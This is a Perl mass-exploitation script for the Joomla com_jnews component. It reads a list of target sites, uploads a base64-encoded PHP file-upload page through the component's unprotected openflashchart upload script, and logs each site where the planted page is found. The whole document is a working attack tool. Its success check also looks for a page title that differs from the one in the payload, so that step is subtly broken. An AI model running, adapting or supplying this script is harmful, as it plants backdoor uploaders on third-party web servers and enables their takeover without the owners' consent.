Com_jnews Exploiter Perl Joomla

1. #!/usr/bin/perl
2. # Module Needed :)
3. use strict;
4. no warnings;
5. use threads;
6. use threads::shared;
7. use LWP::UserAgent;
8. use HTTP::Request;
9. use LWP::Simple;
10. use HTTP::Request::Common;
11. use Term::ANSIColor;
12. use Win32::Console::ANSI;
13. use MIME::Base64;
14. ##############################
15. if($^O =~ /Win/){
16. system("cls");
17. }else{
18. system("clear");
19. }
20. my $ua = LWP::UserAgent->new;
21. $ua->timeout(15);
22. $ua->agent('Mozilla/5.0');
23. print color("bold red"),"[+] Com_jnews Joomla Components RCI Exploits Scanner (Threads on) \n";
24. print color("bold red"),"[+] coded by Mr_AnarShi-T\n";
25. print color("bold red"),"[+] Gr33T's : Boy Security & cold Zero & Dod & Normal & Orange man & all \n";
26. print color("bold red"),"[+] Home : Www.site.com & My Lab :) \n\n";
27. print color 'reset';
28. print color("green"),"[+] Enter File : ";
29. print color 'reset';
30. my $file=<STDIN>;
31. chomp($file);
32. print color("green"),"\n[+] Enter Thread Number : ";
33. print color 'reset';
34. my $thread=<STDIN>;
35. chomp($thread);
36. my $threads = $thread;
37. my @linkz : shared;
38. my @paths : shared;
39. GetLinks();
40. while (threads->list) {}
41. print color ('green');
42. print "\n[+] Link Founded : ";
43. print color 'reset';
44. print"".scalar(@linkz)."\n\n";
45. CheckLinks();
46. while (threads->list) {}
47. sub GetLinks {
48. open( LNK, "$file" ) or die "$!\n";
49. while( defined( my $line_ = <LNK> ) ) {
50. chomp( $line_ );
51. push( @linkz, $line_ );
52. }
53. close( LNK );
54. }
55. sub CheckLinks {
56. foreach my $link( @linkz ) {
57. my $ctr = 0;
58. foreach my $thr ( threads->list ) { $ctr++; }
59. if ($ctr < $threads){
60. threads->create( \&CheckLinkz_exploits,$link );
61. }
62. else { redo; }
63. }
64. }
65. sub CheckLinkz_exploits {
66. my $link = shift ;
67. chomp ($link);
68. my $site_vul = "http://".$link . "/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php?name=m-a.php";
69. my $encoded ="PD9waHANCmVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgR09PR0xFSU5VUkwgPC90aXRsZT4nOw0KZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXINCiIgaWQ9InVwbG9hZGVyIj4nOw0KZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0Ig0KaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOw0KaWYoICRfUE9TVFsnX3VwbCddID09ICJVcGxvYWQiICkgew0KICAgICAgICBpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICcNCjxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyB9DQogICAgICAgIGVsc2UgeyBlY2hvICc8Yj5GQUxIQSEhITwvYj48YnI+PGJyPic7IH0NCn0NCj8+";
70. my $evil = decode_base64($encoded);
71. my $res = $ua->request(POST $site_vul,Content_Type => 'text/plain', Content => $evil);
72. print "[+] Checking $link\n\n";
73. if ($res->is_success){
74. print "[+] $link is vul\n";
75. print "[+] Checking If The Evil code Was Uploded\n";
76. my $vul="/components/com_jnews/includes/openflashchart/tmp-upload-images/m-a.php";
77. my $url = "http://".$link. $vul;
78. my $request = HTTP::Request->new(GET=>$url);
79. my $useragent = LWP::UserAgent->new();
80. my $response = $useragent->request($request);
81. if ($response->content=~m/<title>Upload Files Mr_AnarShi-T <\/title>/g){
82. print color("yellow"),"[.] Found => $url\n\n";
83. print color 'reset';
84. open(BEN,">>result-$link.txt");
85. print BEN "$url\n";
86. close(BEN);
87. }
88. else
89. {
90. print "[.] Not Found \n";
91. }
92. }
93. threads->detach();
94. }